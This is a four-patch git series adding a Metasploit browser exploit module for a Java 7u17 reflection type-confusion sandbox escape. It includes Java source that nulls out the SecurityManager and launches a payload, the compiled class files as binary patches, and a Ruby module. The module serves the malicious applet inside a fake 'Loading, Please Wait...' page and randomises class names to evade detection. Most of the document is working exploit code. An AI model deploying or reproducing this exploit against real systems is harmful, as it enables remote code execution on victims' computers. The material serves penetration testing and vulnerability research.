From 19f2e72dbb64b5687af84d0dbc2a38aa48029db3 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Thu, 18 Apr 2013 16:10:11 -0500
Subject: [PATCH 1/4] Added module for Java 7u17 sandboxy bypass

---
 data/exploits/jre7u17/Exploit.class           | Bin 0 -> 1805 bytes
 data/exploits/jre7u17/SystemClass.class       | Bin 0 -> 624 bytes
 data/exploits/jre7u17/Union1.class            | Bin 0 -> 246 bytes
 data/exploits/jre7u17/Union2.class            | Bin 0 -> 241 bytes
 external/source/jre7u17/Exploit.java          |  75 ++++++++++
 .../browser/java_jre17_reflection_types.rb    | 133 ++++++++++++++++++
 6 files changed, 208 insertions(+)
 create mode 100755 data/exploits/jre7u17/Exploit.class
 create mode 100755 data/exploits/jre7u17/SystemClass.class
 create mode 100755 data/exploits/jre7u17/Union1.class
 create mode 100755 data/exploits/jre7u17/Union2.class
 create mode 100755 external/source/jre7u17/Exploit.java
 create mode 100644 modules/exploits/multi/browser/java_jre17_reflection_types.rb

diff --git a/data/exploits/jre7u17/Exploit.class b/data/exploits/jre7u17/Exploit.class
new file mode 100755
index 0000000000000000000000000000000000000000..a1d3f5c1e915949f20aedbdb268e43730e4cd831
GIT binary patch
literal 1805
zcma)7Yf}?f7=8|foMc(9v1qhVv0TD6T*TIZTFOPyfYbmj+S`(xz{0YdNj4Uyzo0*$
zzo0Yai~XRZ$kdsRpZ!s7pWOtrRHyCC&N=V(d7ty1%f9*Z_dftk!qL!$F%9FGkeH0%
zs>GCrYxqRsQ;F*lq%<^OT4E*&i5pSW<A#QtxTPV2F^SKjoM$yOdLW-;&Ku^VR2QOH
z#BB|&xZ_Dn8ai=T!#$)WmL*ms?n|r+glA0KbZ-jOCk8eILUT?|3ACh5TdkD$w^VV>
z*s^Hp$eATi%BXC)Xu5~XhHY%CqCiu|HL`olM!^r1_(I|V7eVqQEubwNWL3d69lJzy
zuU4f#JsGE5%&JAxgVz@h3YKHKqr1jqL&rzBERoT%hA#zLJzLT;?Cs>dQ})?});3oc
zNVDddvy4(n;wv4Scqq_T^DNn}@|lL$ZPFO$n)9Zza^pH4;cIHXc|ylkd_(#=zQuQE
zie?T=uG-h}Jq)f*#}=|Wa!{TnFR`s-2jpyGSI3?weeAKfbnL?xh}D?9ZN(Yu+D_5=
zq0(eo?SeqNpJfyZmU5G`{v^;@gEH;M&YnsxD|g4q-7)N(*TnNRe^KQvm35Pg-bw|!
zYM%FGa%aMp<Ls3S6w*~eU$Sjg^xLW!FpwBX|2s%eC39M!_kRVl$9dDv@%XrAHltkE
zJ5B3}Ko!6Ebij~ti>AFDv{XX=gBmHdZYy_QWi6wqa@C%U1WQ$sgFt6mNQkxokxE&C
z#!5FA4vefTa4v{gWyU*IIc^i&)BwW$tzGU9Ve83Epf8wO^##e)!b@Iw|9isU1@|s=
zQ@V0|-!cxUES{gZPF|$&&b{tDv*G`6d%W|LV@%ywu2J%@ZgSN)v>bz{Ewpc#Joz1o
zM*&W!9o|4UpQ0|le&Ay!ysOT!n_4$#!MS1ZCB#z-0#`U{sN;AEA$-WUj(3YX!^IRW
z5qf?*L0t^>?V%VNjuF1+tMXJ$#}H|c9z$D>q0tvso<UEAo}nq#Fi7zj%|qg~m)iUa
zk<FKANrmI#7+PPT?G+knXiv$JxEzj$j}be@xxu&>I}{IbjLYZv;5j-@aQ;`c_?mcu
zjw4*GdM@}L{nT^8TUMRFtQEv4Uq%ZT(?v@^mo|nTOraMk^kJ5kB_!|w19*r*WHAH>
z!zg0}KVlR=A&H-v@eBVQPngw1v@59li^hmVumAN)@ay-#gd`9;hy*rHu$h90r@c3*
zd2MbzL0p{R;t?Y0BZSgVeXHaqT%uQ^nRyldUDSXX?%^#;i;S4%Z)cGa^IX$ypHCy|
b?@A2MNpfb|C==>PdxNvag4alW9r3>bnq#Ec

literal 0
HcmV?d00001

diff --git a/data/exploits/jre7u17/SystemClass.class b/data/exploits/jre7u17/SystemClass.class
new file mode 100755
index 0000000000000000000000000000000000000000..1322475ea9c1b69ff33413be6e5bd410db877e11
GIT binary patch
literal 624
zcmZ9I$xZ@66h&__DxeI`1Bx@C5h)y_aYJ-Pbb)c-U}KszV4yMjS*}c6_yK;D@mA%n
zT=Y4ws&gu-`uY9(22jI60%4TmD95p{5b9JFa*eL@>QsEE|6I9mb=`JwY5r(~n!&Nb
ziNUGCnZdcig+jPfJ+kCMoEed<NM<BEk|D{GWJ=mr+g96F+g96F+g96F+g96F+g97Q
z#x{24^}XPl2Np|@3X%HY$yG=<yuN!k?zP<EgVXZ4lV}dc!?t_tnMLa6?ZqE>!J)Z!
z3R~D#NH*U`f!nM5&S<2N`Trm&AjEeA*7!vbC4rbYE}jriiWB0bI3=DEPm9yyj5sUK
ziD$&K;yLlWctN}<UJ@^hSH!F0ym(E#E-r{S#GBTNH{}ySVTV(mHapSsC)5WAg<Udc
MH?!m(S0NPt0IxJfDF6Tf

literal 0
HcmV?d00001

diff --git a/data/exploits/jre7u17/Union1.class b/data/exploits/jre7u17/Union1.class
new file mode 100755
index 0000000000000000000000000000000000000000..e9d683ea802b9c3e8c8f42b1b3a47a84f44f629e
GIT binary patch
literal 246
zcmZ9G%?`m(5QWcZwNz2|5=$&JSP~l{kq8Sv`?fB*P2Gx=cr7c5g$M9ZVk)t*m~ZBs
z$^5+Dk0*d0Di$=9Oq5MH1Y;*fwCxaR`V(D3bryOT&y75_cNcyrf~3#gfmAXX60}Bh
zL(oU@RuIZFsl@zz@WpB6`4KzTGCrRIF_EdT$Jb*N%cPwyw2?!e7p;|y72kCJub_?$
oe+MR@Bg+H~m`vi}Y0ef`HO{G%ZQVh)Z@a)WzNX2vS!GcC0GAys+5i9m

literal 0
HcmV?d00001

diff --git a/data/exploits/jre7u17/Union2.class b/data/exploits/jre7u17/Union2.class
new file mode 100755
index 0000000000000000000000000000000000000000..aeaae4cb817b092d8ba221ff56a48269fd2558e7
GIT binary patch
literal 241
zcmXwz%MQU%5QhJ8X{n+fKw^mn!IIbri9}eq>`yu5$Z;xK!ed!UEIfdR5>tuAd^7()
znalh0d;#d7<RFQHjiL>YU~QGun-+n_f6*r7C-Ykv$-_X4Fzj-pr;LjFgk-h0BBTbv
zMiPn>W#sgH@a1VCe9ewC56-8x9I05i!|PE8Dr)S-MYzZy%Zrvq1%@wpvDwtZ?3y!w
tFV_(&NbqA|0x6`KfCZaL96Zh0;i}9zcGC3+=>BWxnAXp9nJ%jY@?SnsD_sBp

literal 0
HcmV?d00001

diff --git a/external/source/jre7u17/Exploit.java b/external/source/jre7u17/Exploit.java
new file mode 100755
index 0000000000..91951ddd11
--- /dev/null
+++ b/external/source/jre7u17/Exploit.java
@@ -0,0 +1,75 @@
+//Original PoC from Jeroen Frijters @Jeroen Frijters
+
+import java.lang.invoke.MethodHandle;
+import java.lang.reflect.Field;
+import static java.lang.invoke.MethodHandles.lookup;
+import java.applet.Applet;
+import metasploit.Payload;
+
+class Union1 {
+	int field1;
+	Object field2;
+}
+
+class Union2 {
+	int field1;
+	SystemClass field2;
+}
+
+class SystemClass {
+	Object f1,f2,f3,f4,f5,f6,f7,f8,f9,f10,f11,f12,
+		f13,f14,f15,f16,f17,f18,f19,f20,f21,f22,f23,
+		f24,f25,f26,f27,f28,f29,f30;
+}
+
+public class Exploit extends Applet
+{
+
+	public Exploit()
+	{
+	}
+        
+	static void disableSecurityManager() throws Throwable {
+		MethodHandle mh1, mh2;
+		mh1 = lookup().findStaticSetter(Double.class, "TYPE", Class.class);
+		mh2 = lookup().findStaticSetter(Integer.class, "TYPE", Class.class);
+		Field fld1 = Union1.class.getDeclaredField("field1");
+		Field fld2 = Union2.class.getDeclaredField("field1");
+		Class classInt = int.class;
+		Class classDouble = double.class;
+		mh1.invokeExact(int.class);
+		mh2.invokeExact((Class)null);
+		Union1 u1 = new Union1();
+		u1.field2 = System.class;
+		Union2 u2 = new Union2();
+		fld2.set(u2, fld1.get(u1));
+		mh1.invokeExact(classDouble);
+		mh2.invokeExact(classInt);
+		if (u2.field2.f29 == System.getSecurityManager()) {
+			u2.field2.f29 = null;
+		} else if (u2.field2.f30 == System.getSecurityManager()) {
+			u2.field2.f30 = null;
+		} else {
+			//System.out.println("security manager field not found");
+		}
+	}    
+
+    public void init()
+    {
+        try
+        {
+			//System.out.println(System.getSecurityManager());
+			disableSecurityManager();
+			//System.out.println(System.getSecurityManager());
+			//Runtime.getRuntime().exec("calc.exe");            
+			Payload.main(null);
+        }
+        catch(Exception exception)
+        {
+            //exception.printStackTrace();
+        } catch(Throwable t) {
+			//t.printStackTrace();
+		}
+    }
+
+}
diff --git a/modules/exploits/multi/browser/java_jre17_reflection_types.rb b/modules/exploits/multi/browser/java_jre17_reflection_types.rb
new file mode 100644
index 0000000000..749101d747
--- /dev/null
+++ b/modules/exploits/multi/browser/java_jre17_reflection_types.rb
@@ -0,0 +1,133 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::EXE
+
+	include Msf::Exploit::Remote::BrowserAutopwn
+	autopwn_info({ :javascript => false })
+
+	def initialize( info = {} )
+
+		super( update_info( info,
+			'Name'          => 'Java Applet Reflection Type Confusion Remote Code Execution',
+			'Description'   => %q{
+					This module abuses Java Reflection to generate a Type Confusion and run code
+				outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier.
+				This exploit doesn't bypass click-to-play, so the user must accept the java warning
+				in order to run the malicious applet.
+			},
+			'License'       => MSF_LICENSE,
+			'Author'        =>
+				[
+					'Jeroen Frijters', # Vulnerability discovery and PoC
+					'juan vazquez' # Metasploit module
+				],
+			'References'    =>
+				[
+					[ 'URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0' ]
+				],
+			'Platform'      => [ 'java', 'win', 'osx', 'linux' ],
+			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
+			'Targets'       =>
+				[
+					[ 'Generic (Java Payload)',
+						{
+							'Platform' => ['java'],
+							'Arch' => ARCH_JAVA,
+						}
+					],
+					[ 'Windows x86 (Native Payload)',
+						{
+							'Platform' => 'win',
+							'Arch' => ARCH_X86,
+						}
+					],
+					[ 'Mac OS X x86 (Native Payload)',
+						{
+							'Platform' => 'osx',
+							'Arch' => ARCH_X86,
+						}
+					],
+					[ 'Linux x86 (Native Payload)',
+						{
+							'Platform' => 'linux',
+							'Arch' => ARCH_X86,
+						}
+					],
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Jan 10 2013'
+		))
+	end
+
+
+	def setup
+		path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "Exploit.class")
+		@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+		path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "Union1.class")
+		@union1_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+		path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "Union2.class")
+		@union2_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+		path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "SystemClass.class")
+		@system_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+
+		@exploit_class_name = rand_text_alpha("Exploit".length)
+		@exploit_class.gsub!("Exploit", @exploit_class_name)
+		super
+	end
+
+	def on_request_uri(cli, request)
+		print_status("handling request for #{request.uri}")
+
+		case request.uri
+		when /\.jar$/i
+			jar = payload.encoded_jar
+			jar.add_file("#{@exploit_class_name}.class", @exploit_class)
+			jar.add_file("Union1.class", @union1_class)
+			jar.add_file("Union2.class", @union2_class)
+			jar.add_file("SystemClass.class", @system_class)
+			metasploit_str = rand_text_alpha("metasploit".length)
+			payload_str = rand_text_alpha("payload".length)
+			jar.entries.each { |entry|
+				entry.name.gsub!("metasploit", metasploit_str)
+				entry.name.gsub!("Payload", payload_str)
+				entry.data = entry.data.gsub("metasploit", metasploit_str)
+				entry.data = entry.data.gsub("Payload", payload_str)
+			}
+			jar.build_manifest
+
+			send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
+		when /\/$/
+			payload = regenerate_payload(cli)
+			if not payload
+				print_error("Failed to generate the payload.")
+				send_not_found(cli)
+				return
+			end
+			send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
+		else
+			send_redirect(cli, get_resource() + '/', '')
+		end
+
+	end
+
+	def generate_html
+		html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
+		html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
+		html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
+		html += %Q|</applet></body></html>|
+		return html
+	end
+
+end

From b99fc06b6fd5b191d7eb99e0ae476b4dcf54d9f0 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Thu, 18 Apr 2013 21:20:35 -0500
Subject: [PATCH 2/4] description updated

---
 .../multi/browser/java_jre17_reflection_types.rb         | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/multi/browser/java_jre17_reflection_types.rb b/modules/exploits/multi/browser/java_jre17_reflection_types.rb
index 749101d747..61197e0fd5 100644
--- a/modules/exploits/multi/browser/java_jre17_reflection_types.rb
+++ b/modules/exploits/multi/browser/java_jre17_reflection_types.rb
@@ -22,10 +22,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		super( update_info( info,
 			'Name'          => 'Java Applet Reflection Type Confusion Remote Code Execution',
 			'Description'   => %q{
-					This module abuses Java Reflection to generate a Type Confusion and run code
-				outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier.
-				This exploit doesn't bypass click-to-play, so the user must accept the java warning
-				in order to run the malicious applet.
+					This module abuses Java Reflection to generate a Type Confusion, due to a weak
+				access control when setting final fields on static classes, and run code outside of
+				the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This
+				exploit doesn't bypass click-to-play, so the user must accept the java warning in
+				order to run the malicious applet.
 			},
 			'License'       => MSF_LICENSE,
 			'Author'        =>

From 9fca89f70b0bd5aaedc41b6e21ed72db4d99b490 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Thu, 18 Apr 2013 23:05:49 -0500
Subject: [PATCH 3/4] fix small issues

---
 .../{jre7u17 => exploits/jre17u17}/Exploit.java |  0
 external/source/exploits/jre17u17/Makefile      | 17 +++++++++++++++++
 2 files changed, 17 insertions(+)
 rename external/source/{jre7u17 => exploits/jre17u17}/Exploit.java (100%)
 create mode 100644 external/source/exploits/jre17u17/Makefile

diff --git a/external/source/jre7u17/Exploit.java b/external/source/exploits/jre17u17/Exploit.java
similarity index 100%
rename from external/source/jre7u17/Exploit.java
rename to external/source/exploits/jre17u17/Exploit.java
diff --git a/external/source/exploits/jre17u17/Makefile b/external/source/exploits/jre17u17/Makefile
new file mode 100644
index 0000000000..5e8a0e26a8
--- /dev/null
+++ b/external/source/exploits/jre17u17/Makefile
@@ -0,0 +1,17 @@
+CLASSES = \
+	Exploit.java
+
+.SUFFIXES: .java .class
+.java.class:
+	javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java
+
+all: $(CLASSES:.java=.class)
+
+install:
+	mv Exploit.class ../../../../data/exploits/jre17u17/Exploit.class
+	mv SystemClass.class ../../../../data/exploits/jre17u17/SystemClass.class
+	mv Union1.class ../../../../data/exploits/jre17u17/Union1.class
+	mv Union2.class ../../../../data/exploits/jre17u17/Union2.class
+
+clean:
+	rm -rf *.class

From 1365dfe68cb780e2eb7847cddccea175e03dbdc7 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Fri, 19 Apr 2013 07:49:12 -0500
Subject: [PATCH 4/4] Add Oracle url

---
 modules/exploits/multi/browser/java_jre17_reflection_types.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/multi/browser/java_jre17_reflection_types.rb b/modules/exploits/multi/browser/java_jre17_reflection_types.rb
index 61197e0fd5..43fb4ff512 100644
--- a/modules/exploits/multi/browser/java_jre17_reflection_types.rb
+++ b/modules/exploits/multi/browser/java_jre17_reflection_types.rb
@@ -36,7 +36,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'References'    =>
 				[
-					[ 'URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0' ]
+					[ 'URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0' ],
+					[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html' ]
 				],
 			'Platform'      => [ 'java', 'win', 'osx', 'linux' ],
 			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },